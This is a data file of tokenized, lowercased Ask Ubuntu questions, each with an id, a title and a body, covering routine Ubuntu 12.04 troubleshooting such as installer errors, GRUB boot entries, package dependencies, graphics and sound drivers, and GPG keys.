136385	`` the installer has encountered an unexpected error ''	i get this error while installing ubuntu after the phase which is shown in the screenshot when i click continue it starts loading the next step but all it loads before the error is a blank page . i have downloaded the installation from this site and have burned it at a low speed so there should n't be any problem with the files . made a second cd same error but got the same error .
136387	parse error on /var/lib/dpkg/status after editing it	hit http : //in.archive.ubuntu.com precise-backports/restricted translation-en hit http : //in.archive.ubuntu.com precise-backports/universe translation-en fetched 12.7 mb in 7min 31s ( 28.2 kb/s ) reading package lists ... error ! e : encountered a section with no package : header e : problem with mergelist /var/lib/dpkg/status e : the package lists or status file could not be parsed or opened . thw problem persists even after executing the following commands : sudo rm /var/lib/apt/lists/* -vf sudo apt-get update actually i was encountering problems with uninstalling crossplatformui . according to an online sugestion i opened the status file and deleted the part of crossplatformui . i have done this before too . but this time after saving the file this error started to show up .
136390	windows 7 , windows 8 entries missing after reinstalling grub	i originally had windows 7 and ubuntu 12.04 installed . after i installed windows preview on a logical partition , the windows boot loader showed only windows 7 and windows 8 , there was no option to start ubuntu , so i reinstalled grub ( following this procedure but now grub shows only ubuntu 12.04 . i ran the boot info script , and this is the results.txt i got ============================= boot info summary : =============================== = > grub2 ( v1.99 ) is installed in the mbr of /dev/sda and looks at sector 1 of the same hard drive for core.img . core.img is at this location and looks for ( , msdos3 ) /boot/grub on this drive . sda1 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : boot files : /grldr /bootmgr /boot/bcd /grldr sda2 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : windows 7 boot files : /windows/system32/winload.exe sda3 : __________________________________________________________________________ file system : ext4 boot sector type : grub2 ( v1.99 ) boot sector info : grub2 ( v1.99 ) is installed in the boot sector of sda3 and looks at sector 1920334440 of the same hard drive for core.img . core.img is at this location and looks for ( , msdos3 ) /boot/grub on this drive . operating system : ubuntu 12.04 lts boot files : /boot/grub/grub.cfg /etc/fstab /boot/grub/core.img sda4 : __________________________________________________________________________ file system : extended partition boot sector type : unknown boot sector info : sda5 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : according to the info in the boot sector , sda5 starts at sector 63 . operating system : boot files : sda6 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : according to the info in the boot sector , sda6 starts at sector 63 . operating system : boot files : sda7 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : according to the info in the boot sector , sda7 starts at sector 63 . operating system : boot files : /bootmgr /windows/system32/winload.exe ============================ drive/partition info : ============================= drive : sda _____________________________________________________________________ disk /dev/sda : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sda1 * 2,048 206,847 204,800 7 ntfs / exfat / hpfs /dev/sda2 962,562,048 1,910,774,879 948,212,832 7 ntfs / exfat / hpfs /dev/sda3 1,910,774,880 1,953,519,119 42,744,240 83 linux /dev/sda4 206,910 962,554,319 962,347,410 f w95 extended ( lba ) /dev/sda5 206,912 102,402,047 102,195,136 7 ntfs / exfat / hpfs /dev/sda6 102,402,111 942,081,839 839,679,729 7 ntfs / exfat / hpfs /dev/sda7 942,081,903 962,554,319 20,472,417 7 ntfs / exfat / hpfs '' blkid '' output : ________________________________________________________________ device uuid type label /dev/sda1 2af85fe4f85fad37 ntfs system reserved /dev/sda2 c46a69cd6a69bcb4 ntfs /dev/sda3 70fc8e20-b69b-47cd-98cf-9c9b0b30e537 ext4 /dev/sda5 b66e58fa6e58b4b9 ntfs /dev/sda6 d4a667a2a66783b8 ntfs /dev/sda7 c05ab0f95ab0ed72 ntfs ================================ mount points : ================================= device mount_point type options /dev/sda3 / ext4 ( rw , errors=remount-ro ) /dev/sda6 /media/d4a667a2a66783b8 fuseblk ( rw , nosuid , nodev , allow_other , default_permissions , blksize=4096 ) /dev/sda7 /media/c05ab0f95ab0ed72 fuseblk ( rw , nosuid , nodev , allow_other , default_permissions , blksize=4096 ) ========================== sda1/grldr embedded menu : =========================== -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- =========================== sda3/boot/grub/grub.cfg : =========================== -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # # do not edit this file # # it is automatically generated by grub-mkconfig using templates # from /etc/grub.d and settings from /etc/default/grub # # # # begin /etc/grub.d/00_header # # # if [ -s $ prefix/grubenv ] ; then set have_grubenv=true load_env fi set default= '' 0 '' if [ `` $ { prev_saved_entry } '' ] ; then set saved_entry= '' $ { prev_saved_entry } '' save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z `` $ { boot_once } '' ] ; then saved_entry= '' $ { chosen } '' save_env saved_entry fi } function recordfail { set recordfail=1 if [ -n `` $ { have_grubenv } '' ] ; then if [ -z `` $ { boot_once } '' ] ; then save_env recordfail ; fi ; fi } function load_video { insmod vbe insmod vga insmod video_bochs insmod video_cirrus } insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos3 ) ' search -- no-floppy -- fs-uuid -- set=root 70fc8e20-b69b-47cd-98cf-9c9b0b30e537 if loadfont /usr/share/grub/unicode.pf2 ; then set gfxmode=auto load_video insmod gfxterm insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos3 ) ' search -- no-floppy -- fs-uuid -- set=root 70fc8e20-b69b-47cd-98cf-9c9b0b30e537 set locale_dir= ( $ root ) /boot/grub/locale set lang=en_us insmod gettext fi terminal_output gfxterm if [ `` $ { recordfail } '' = 1 ] ; then set timeout=-1 else set timeout=10 fi # # # end /etc/grub.d/00_header # # # # # # begin /etc/grub.d/05_debian_theme # # # set menu_color_normal=white/black set menu_color_highlight=black/light-gray if background_color 44,0,30 ; then clear fi # # # end /etc/grub.d/05_debian_theme # # # # # # begin /etc/grub.d/10_linux # # # function gfxmode { set gfxpayload= '' $ 1 '' if [ `` $ 1 '' = `` keep '' ] ; then set vt_handoff=vt.handoff=7 else set vt_handoff= fi } if [ $ { recordfail } ! = 1 ] ; then if [ -e $ { prefix } /gfxblacklist.txt ] ; then if hwmatch $ { prefix } /gfxblacklist.txt 3 ; then if [ $ { match } = 0 ] ; then set linux_gfx_mode=keep else set linux_gfx_mode=text fi else set linux_gfx_mode=text fi else set linux_gfx_mode=keep fi else set linux_gfx_mode=text fi export linux_gfx_mode if [ `` $ linux_gfx_mode '' ! = `` text '' ] ; then load_video ; fi menuentry 'ubuntu , with linux 3.2.0-24-generic-pae ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos3 ) ' search -- no-floppy -- fs-uuid -- set=root 70fc8e20-b69b-47cd-98cf-9c9b0b30e537 linux /boot/vmlinuz-3.2.0-24-generic-pae root=uuid=70fc8e20-b69b-47cd-98cf-9c9b0b30e537 ro quiet splash $ vt_handoff initrd /boot/initrd.img-3.2.0-24-generic-pae } menuentry 'ubuntu , with linux 3.2.0-24-generic-pae ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod gzio insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos3 ) ' search -- no-floppy -- fs-uuid -- set=root 70fc8e20-b69b-47cd-98cf-9c9b0b30e537 echo 'loading linux 3.2.0-24-generic-pae ... ' linux /boot/vmlinuz-3.2.0-24-generic-pae root=uuid=70fc8e20-b69b-47cd-98cf-9c9b0b30e537 ro recovery nomodeset echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.2.0-24-generic-pae } submenu `` previous linux versions '' { menuentry 'ubuntu , with linux 3.2.0-23-generic-pae ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos3 ) ' search -- no-floppy -- fs-uuid -- set=root 70fc8e20-b69b-47cd-98cf-9c9b0b30e537 linux /boot/vmlinuz-3.2.0-23-generic-pae root=uuid=70fc8e20-b69b-47cd-98cf-9c9b0b30e537 ro quiet splash $ vt_handoff initrd /boot/initrd.img-3.2.0-23-generic-pae } menuentry 'ubuntu , with linux 3.2.0-23-generic-pae ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod gzio insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos3 ) ' search -- no-floppy -- fs-uuid -- set=root 70fc8e20-b69b-47cd-98cf-9c9b0b30e537 echo 'loading linux 3.2.0-23-generic-pae ... ' linux /boot/vmlinuz-3.2.0-23-generic-pae root=uuid=70fc8e20-b69b-47cd-98cf-9c9b0b30e537 ro recovery nomodeset echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.2.0-23-generic-pae } } # # # end /etc/grub.d/10_linux # # # # # # begin /etc/grub.d/20_linux_xen # # # # # # end /etc/grub.d/20_linux_xen # # # # # # begin /etc/grub.d/20_memtest86+ # # # menuentry `` memory test ( memtest86+ ) '' { insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos3 ) ' search -- no-floppy -- fs-uuid -- set=root 70fc8e20-b69b-47cd-98cf-9c9b0b30e537 linux16 /boot/memtest86+.bin } menuentry `` memory test ( memtest86+ , serial console 115200 ) '' { insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos3 ) ' search -- no-floppy -- fs-uuid -- set=root 70fc8e20-b69b-47cd-98cf-9c9b0b30e537 linux16 /boot/memtest86+.bin console=ttys0,115200n8 } # # # end /etc/grub.d/20_memtest86+ # # # # # # begin /etc/grub.d/30_os-prober # # # # # # end /etc/grub.d/30_os-prober # # # # # # begin /etc/grub.d/40_custom # # # # this file provides an easy way to add custom menu entries . simply type the # menu entries you want to add after this comment . be careful not to change # the 'exec tail ' line above . # # # end /etc/grub.d/40_custom # # # # # # begin /etc/grub.d/41_custom # # # if [ -f $ prefix/custom.cfg ] ; then source $ prefix/custom.cfg ; fi # # # end /etc/grub.d/41_custom # # # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- =============================== sda3/etc/fstab : ================================ -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda3 during installation uuid=70fc8e20-b69b-47cd-98cf-9c9b0b30e537 / ext4 errors=remount-ro 0 1 /dev/fd0 /media/floppy0 auto rw , user , noauto , exec , utf8 0 0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- =================== sda3 : location of files loaded by grub : ==================== gib - gb file fragment ( s ) = boot/grub/core.img 1 = boot/grub/grub.cfg 1 = boot/initrd.img-3.2.0-23-generic-pae 2 = boot/initrd.img-3.2.0-24-generic-pae 2 = boot/vmlinuz-3.2.0-23-generic-pae 1 = boot/vmlinuz-3.2.0-24-generic-pae 1 = initrd.img 2 = initrd.img.old 2 = vmlinuz 1 = vmlinuz.old 1 ======================== unknown mbrs/boot sectors/etc : ======================== unknown bootloader on sda4 00000000 00 26 01 26 02 26 03 26 04 26 05 26 06 26 07 26 |. & . & . & . & . & . & . & . & | 00000010 08 26 09 26 0a 26 0b 26 0c 26 0d 26 0e 26 0f 26 |. & . & . & . & . & . & . & . & | 00000020 10 26 11 26 12 26 13 26 14 26 15 26 16 26 17 26 |. & . & . & . & . & . & . & . & | 00000030 18 26 19 26 1a 26 1b 26 1c 26 1d 26 1e 26 1f 26 |. & . & . & . & . & . & . & . & | 00000040 20 26 21 26 22 26 23 26 24 26 25 26 26 26 27 26 | & ! & '' & # & $ & % & & & ' & | 00000050 28 26 29 26 2a 26 2b 26 2c 26 2d 26 2e 26 2f 26 | ( & ) & * & + & , & - & . & / & | 00000060 30 26 31 26 32 26 33 26 34 26 35 26 36 26 37 26 |0 & 1 & 2 & 3 & 4 & 5 & 6 & 7 & | 00000070 38 26 39 26 3a 26 3b 26 3c 26 3d 26 3e 26 3f 26 |8 & 9 & : & ; & < & = & > & ? & | 00000080 40 26 41 26 42 26 43 26 44 26 45 26 46 26 47 26 | @ & a & b & c & d & e & f & g & | 00000090 48 26 49 26 4a 26 4b 26 4c 26 4d 26 4e 26 4f 26 |h & i & j & k & l & m & n & o & | 000000a0 50 26 51 26 52 26 53 26 54 26 55 26 56 26 57 26 |p & q & r & s & t & u & v & w & | 000000b0 58 26 59 26 5a 26 5b 26 5c 26 5d 26 5e 26 5f 26 |x & y & z & [ & \ & ] & ^ & _ & | 000000c0 60 26 61 26 62 26 63 26 64 26 65 26 66 26 67 26 |` & a & b & c & d & e & f & g & | 000000d0 68 26 69 26 6a 26 6b 26 6c 26 6d 26 6e 26 6f 26 |h & i & j & k & l & m & n & o & | 000000e0 70 26 71 26 72 26 73 26 74 26 75 26 76 26 77 26 |p & q & r & s & t & u & v & w & | 000000f0 78 26 79 26 7a 26 7b 26 7c 26 7d 26 7e 26 7f 26 |x & y & z & { & | & } & ~ & . & | 00000100 80 26 81 26 82 26 83 26 84 26 85 26 86 26 87 26 |. & . & . & . & . & . & . & . & | 00000110 88 26 89 26 8a 26 8b 26 8c 26 8d 26 8e 26 8f 26 |. & . & . & . & . & . & . & . & | 00000120 90 26 91 26 92 26 93 26 94 26 95 26 96 26 97 26 |. & . & . & . & . & . & . & . & | 00000130 98 26 99 26 9a 26 9b 26 9c 26 9d 26 9e 26 9f 26 |. & . & . & . & . & . & . & . & | 00000140 a0 26 a1 26 a2 26 a3 26 a4 26 a5 26 a6 26 a7 26 |. & . & . & . & . & . & . & . & | 00000150 a8 26 a9 26 aa 26 ab 26 ac 26 ad 26 ae 26 af 26 |. & . & . & . & . & . & . & . & | 00000160 b0 26 b1 26 b2 26 b3 26 b4 26 b5 26 b6 26 b7 26 |. & . & . & . & . & . & . & . & | 00000170 b8 26 b9 26 ba 26 bb 26 bc 26 bd 26 be 26 bf 26 |. & . & . & . & . & . & . & . & | 00000180 c0 26 c1 26 c2 26 c3 26 c4 26 c5 26 c6 26 c7 26 |. & . & . & . & . & . & . & . & | 00000190 c8 26 c9 26 ca 26 cb 26 cc 26 cd 26 ce 26 cf 26 |. & . & . & . & . & . & . & . & | 000001a0 d0 26 d1 26 d2 26 d3 26 d4 26 d5 26 d6 26 d7 26 |. & . & . & . & . & . & . & . & | 000001b0 d8 26 d9 26 da 26 db 26 dc 26 dd 26 de 26 00 a4 |. & . & . & . & . & . & . & ..| 000001c0 15 0d 07 ef ff ff 02 00 00 00 c0 5f 17 06 00 ef | ... ... ... .._ ... .| 000001d0 ff ff 05 ef ff ff c2 5f 17 06 30 7f 0c 32 00 00 | ... ... ._..0..2..| 000001e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ... ... ... ... ... .| 000001f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 aa | ... ... ... ... ..u.| 00000200 =============================== stderr messages : =============================== xz : ( stdin ) : compressed data is corrupt xz : ( stdin ) : compressed data is corrupt awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in
136391	where do screenshots go in ubuntu 12.04 with gnome-classic when pressing prtsc/sysrq ?	i am trying to take a screenshot with the prtsc sysrq key on my ubuntu 12.04 with gnome-classic ( no effects ) . when i press on the prtsc sysrq key , i can hear a snapshot sound , but i ca n't see a menu showing up or a picture being produced . if i try it on the command line with gnome-screenshot , i get this error : ** ( gnome-screenshot:14000 ) : warning ** : unable to use gnome shell 's builtin screenshot interface , resorting to fallback x11 . error : gdbus.error : org.freedesktop.dbus.error.serviceunknown : the name org.gnome.shell was not provided by any .service files
136394	can not install ia32-libs	i do n't know why i ca n't install ia32-libs . it claims for a dependency that can not be found on repos . junior @ mediacenter : ~ $ sudo apt-get install ia32-libs reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : ia32-libs : depends : ia32-libs-multiarch e : unable to correct problems , you have held broken packages . junior @ mediacenter : ~ $ sudo apt-get install ia32-libs-multiarch reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : ia32-libs-multiarch : i386 : depends : gstreamer0.10-plugins-good : i386 but it is not going to be installed depends : gtk2-engines : i386 but it is not going to be installed depends : gtk2-engines-murrine : i386 but it is not going to be installed depends : gtk2-engines-pixbuf : i386 but it is not going to be installed depends : gtk2-engines-oxygen : i386 but it is not going to be installed depends : ibus-gtk : i386 but it is not going to be installed depends : libcanberra-gtk-module : i386 but it is not going to be installed depends : libcurl3 : i386 but it is not going to be installed depends : libgail-common : i386 but it is not going to be installed depends : libglapi-mesa : i386 but it is not going to be installed depends : libglu1-mesa : i386 but it is not going to be installed depends : libgtk2.0-0 : i386 but it is not going to be installed depends : libqt4-opengl : i386 but it is not going to be installed depends : librsvg2-common : i386 but it is not going to be installed recommends : libgl1-mesa-glx : i386 but it is not going to be installed recommends : libgl1-mesa-dri : i386 but it is not going to be installed e : unable to correct problems , you have held broken packages . running ubuntu precise : junior @ mediacenter : ~ $ uname -a linux mediacenter 3.2.0-24-generic # 37-ubuntu smp wed apr 25 08:43:22 utc 2012 x86_64 x86_64 x86_64 gnu/linux synaptic fix broken package does nothing . any tips ? ? thanks i need this package to install other apps like teamviewer7 . my sources.list is here .
136397	seamless mode not working correctly in virtual box	i run ubuntu desktop in a virtualbox seamless mode , hosted on windows 7 . i recently upgraded from 11.10 to 12.04 and seamless mode no longer works correctly . i have re-installed guest extensions . the problem is that the ubuntu desktop wallpaper is shown , effectively blocking the windows desktop . i can bring windows apps to the foreground , but as soon as i bring any ubuntu window to the foreground , all the windows apps will disappear , hidden by the ubuntu desktop even if i activated an ubuntu window in a different monitor . so , it is not very much different from full-screen mode at this time . i suspect if i could turn off the ubuntu desktop or wallpaper this would be a sufficient workaround ( this is basically what seamless mode is ) but that does not seem to be possible within ubuntu itself . [ jeremy does n't specify system config , but i can confirm i 'm seeing this behavior in win 7 64-bit with both 32-bit and 64-bit guests . giovanni sees the same thing on his laptop running vista ultimate 64 bit after upgrading his 32-bit guest to 12.04 ( forums.virtualbox.org p225407 , requires logging in with your free oracle account ) . i was using vbox 4.1.14r77440 and matching guest additions . i upgraded to 4.1.16-78094 vbox+additions . still a problem . and i filed launchpad bug 999929 to see if i can get feedback from developers . â tbc0 ] any other ideas ?
136400	how do i compile & install the newest version of transmission ?	i 'm trying to install transmission 2.51 on ubuntu 10.04 . compiling the source goes fine , but i ca n't seem to get it to compile the gui as well . this is the configure output : configuration : source code location : . compiler : g++ build libtransmission : yes * optimized for low-resource systems : no * âľtp enabled : yes build command-line client : yes build gtk+ client : no ( gtk+ none ) * libappindicator for an ubuntu-style tray : no build daemon : yes build mac client : no how do i get it to build the gtk+ client ?
136405	screen goes purple on ubuntu 12.04	i did a fresh install of ubuntu 12.04 64bit on my machine , a hp 431 with intel core i5 sandybridge-based processor , ati radeon 6470m , 2 gb ram nb : i have turned off the ati driver . after 2 weeks i found my screen getting purple line and hangs . here my screenshot . what is this ?
136408	update information message box	i recently updated to 12.04 . each time i login , i get an update information message box written in many languages : failure to download extra data filesname-ar.utf-8 : فشل تنزيل ملفات البيانات > الإضافيةname-ast.utf-8 : fallu al descargar ficheros de datos estraname-bn.utf-8 : অতিরিক্ত > ডাটা ফাইল ডাউনলোড করতে ব্যর্থ হয়েছেname-bs.utf-8 : neuspjelo učitavanje dodatnih datoteka s > podacimaname-ca.utf-8 : ha fallat la baixada dels fitxers de dades addicionalsname- > da.utf-8 : kunne ikke hente ekstra datafilername-de.utf-8 : herunterladen von > zusätzlichen datendateien schlug fehlname-el.utf-8 : αποτυχία λήψης επιπλέον αρχείων > δεδομένωνname-en_au.utf-8 : failure to download extra data filesname-en_gb.utf-8 : ? > failure to download extra data filesname-eo.utf-8 : fiasko dum elŝutado de pliaj datumdosierojname-es.utf-8 : fallo al descargar archivos de datos extraname-fi.utf-8 : ylimääräisten tiedostojen lataus epäonnistuiname-fr.utf-8 : échec du téléchargement des données supplémentairesname-gd.utf-8 : dh'fhàillig luchdadh a-nuas faidhlichean dàta a bharrachdname-gl.utf-8 : fallo na descarga de ficheiros extra de datosname-he.utf-8 : הורדת קובצי נתוני נוספים נכשלהname-hr.utf-8 : greška pri preuzimanju dodatnih podatkovnih datotekaname-hu.utf-8 : nem sikerült letölteni az extra adatfájlokatname-id.utf-8 : gagal mengunduh berkas data ekstraname-it.utf-8 : scaricamento file dati extra non riuscitoname-ja.utf-8 : 追加データのダウンロードに失敗name-km.utf-8 : បាន​បរាជ័យ​ក្នុង​ការ​ទាញយក​ឯកសារ​ទិន្នន័យ​បន្ថែមname-lt.utf-8 : nepavyko atsiųsti papildomų duomenų failųname-lv.utf-8 : neizdevās lejupielādēt papildus datu failusname-ms.utf-8 : gagal memuat turun fail data tambahanname-nl.utf-8 : downloaden van extra gegevensbestanden is misluktname-oc.utf-8 : fracàs del telecargament de las donadas suplementàriasname-pt_br.utf-8 : falha ao baixar arquivos de dados adicionaisname-ro.utf-8 : eșec la descărcarea fișierelor cu date suplimentarename-ru.utf-8 : ошибка загрузки дополнительных файлов данныхname-sk.utf-8 : zlyhalo stiahnutie ďalších dátových súborovname-sl.utf-8 : napaka med prejemom dodatnih podatkovnih datotekname-sq.utf-8 : dështoi shkarkimi i skedarëve të të dhënave ekstraname-sv.utf-8 : misslyckades med att hämta extra datafilername-tr.utf-8 : fazladan veri dosyalarını indirme başarısızname-ug.utf-8 : قوشۇمچە سانلىق-مەلۇمات ھۆججەتلىرىنى چۈشۈرۈش مەغلۇپ بولدىname-uk.utf-8 : не вдалось завантажити додаткові файли данихname-vi.utf-8 : lỗi khi tải các tập tin dữ liệu bổ sung xuốngname-zh_cn.utf-8 : 下载额外数据文件失败name-zh_tw.utf-8 : 下載額外資料檔案失敗 the following packages requested additional data downloads after package installation , but the data could not be downloaded or could not be processed . flashplugin-installer the download will be attempted again later , or you can try the download again now . running this command requires an active internet connection . i reinstalled the flashplugin-installer , but still got this message box . i have even deleted it completely but still the message appears after login . how to fix it ?
136409	python-pandas install wants to remove r	ubuntu 12.04 lts when trying to install python-pandas 0.7.0-1 , synaptic wants to uninstall my complete r installation . this does not make any sense . is it a bug or a feature ?
136417	mysql access via php does n't find database	i installed apache2 , php5 , mysql-server , php5-mysql , phpmyadmin in that order on ubuntu 12.04 with the software center . apache and php works fine , no problems . also , if i try to work with mysql via phpmyadmin , everything works as expected . problems start , when i want to use mysql via php . for this i tried the following script : $ connection = mysql_connect ( $ host , $ user , $ pw ) or die ( mysql_errno ( ) . '' `` .mysql_error ( ) ) ; mysql_select_db ( $ db , $ connection ) or die ( mysql_errno ( ) . '' `` .mysql_error ( ) ) ; this returns `` 1046 no database selected '' . i 'm sure that the database exists , i even tried it with the standard `` test '' -database and root as the user . what made me really curious , is that when i use a non-existent user ( `` asdf '' ) , the same message appears and no failure from the mysql_connect-function . this leads me to the suspicion , that i struggle with user rights in the linux system , because it works with phpmyadmin , which is not installed via a webinstaller but via the software center . i can only guess that hence , phpmyadmin has other rights to access mysql than php , but i do n't know , how to approach the problem . after trying and googleing for hours , i feel a bit lost now . please help me .
136419	why do i see a purple then black screen when booting and a 'failed to load module `` nv '' ' error when running startx in tty1 ?	i just installed ubuntu 12.04 lts from a usb stick . after the installation ( xp works besides ) grub shows both os . when trying to start there is the purple screen for some seconds , and then the screen goes black , but with backlight . no mouse no cursor . with ctrl+alt+f2 i get into tty1 . trying startx i get to the messages that state : failed to load module `` nv '' and some other nvidia related error messages . well , from the stick without installation on hdd everything was great , but now i dont get into the gui . maybe there is some help for me ? i tried updating of the drivers and some other things , ( ppa ) but it does not work
136420	recording sound on 12.04 lts	i am attempting to use the microphone port to send sound from a mixer out to ustream . my problem seems that the drivers are not working correctly . the machine can play sound just fine and everything else works perfectly . this is a older dell optiplex gx60 with 4gigs of ram on board . this is a simple install for this purpose only so this machine should be able to handle what i am asking it to do for our podcast . is there something i can look at to see what the deal is , yes i check the sound panel to ensure the levels are up enough . any ideas ? better sound drivers somewhere ? thanks
136423	crossplatformui error	i face crossplatformui errors when i install the crossplatformui application for mts mblaze wireless broadband modem . on a forum i learnt that the error was because the package needed a kernel version lower than 2.6 whereas i use ubuntu 12.04 the kernel version being 3.2.0.24 so i want to know where i could find a compatible crossplatformui package for the kernel version 3.2.0.24 a safe way to remove crossplatformui other than editing the dpkg status file which did work once but caused a big problem lately . i would like to know a safer and better way to remove/purge it
136424	user-specific log in background not working in 12.04	the new feature included in ubuntu 12.04 precise of having users-pecific background image at the login screen in lightdm is not working ... i have set a custom image other than my wallpaper ( as i cant set the dynamic gnome 3.4 wallpaper as the login-screen image ) through ubuntu tweak . i created 2 new users but i cant get the respective wallpapers as the background images . do i need to select `` set the same immage as my wallpaper '' in ubuntu tweak to get this workin or is ther any other method ? ? thanx ! !
136427	gmote fails to install . java problem ?	i am having problems installing the gmote server for linux ( 12.04 lts0 java jre is installed ( i think ) anton @ anton-vgn-nw11s-t : ~ $ '/home/anton/downloads/ gmoteserverlinux2.0.0/gmoteserver.sh ' starting gmoteserver 2.0 ... gmoteserver started . anton @ anton-vgn-nw11s-t : ~ $ exception in thread `` main '' java.lang.noclassdeffounderror : org/gmote/server/gmoteserveruilinux caused by : java.lang.classnotfoundexception : org.gmote.server.gmoteserveruilinux at java.net.urlclassloader $ 1.run ( urlclassloader.java:217 ) at java.security.accesscontroller.doprivileged ( native method ) at java.net.urlclassloader.findclass ( urlclassloader.java:205 ) at java.lang.classloader.loadclass ( classloader.java:321 ) at sun.misc.launcher $ appclassloader.loadclass ( launcher.java:294 ) at java.lang.classloader.loadclass ( classloader.java:266 ) could not find the main class : org.gmote.server.gmoteserveruilinux . program will exit . is this a problem with the tar.gz file or is java not installed ... . thanks
136430	intel hd graphic card installation	i 'm using ubuntu 11.10 it 's missing intel hd graphics card . how can i install it from terminal ?
136435	installing google ime	can i install google transliteration ime ( input method editor which allows users to enter text in one of the supported languages using a roman keyboard ) , on ubuntu 12.04 ? . i need to type in sinhalese ( the language of sri lanka ) . i 'm a novice on ubuntu . please ... . i need your help . p s : please note that my question is not about `` google transliteration '' . i.e . type a word in english and press space to transliterate .
136438	is there any ubuntu-program that you can use as mp3-player-firmware ?	i would like to format my mp3-player ( philips gogear 2120 ) with ext3 and to use a linux player on it . does anybody know if this is possible ? thanks for your comments !
136445	ubuntu-tweak tweaks get ignored after reboots	when i set the corners to reveal workspaces/windows , it stops working after a couple of reboots . why ? in addition , my chosen login screen lasts for 1 second during login and reverts to current wallpaper . why ?
136454	can i get new cd or dvd of ubuntu ? also softwares ?	from where , can i get new cd or dvd of ubuntu ? also softwares and drivers ?
136455	ubuntu one does n't show captcha in windows 7	i try to set up a new u1 account in w7 . however , the sign on screen reports `` there was a problem getting the captcha , reloading '' - but nothing seems to happen . i tried it on two different computers ( in the same home network ) . same result . anything to do or is u1 for w7 corrupt ? also experiencing this problem . trying to install latest u1 on brand new toshiba win7 laptops at work and the captcha field is simply blank , there is nothing to copy . tried refresh , restart , reload and different browsers ( firefox 13 , ie9 ) and nothing improved the situtation . without being able to see the captcha i can not do anything at all and will have to use silverlight if i ca n't overcome this .
136456	can i use gpg on both ubuntu and windows to encrypt my files	i have a private gpg key for ubuntu . my question is : how can i use same encryption key for both windows and ubuntu ? if i use gpg in ubuntu , can i use that same gpg key with windows or vice versa ? or more simply : if i sign a file with gpg in ubuntu , how can i use that file in windows ?
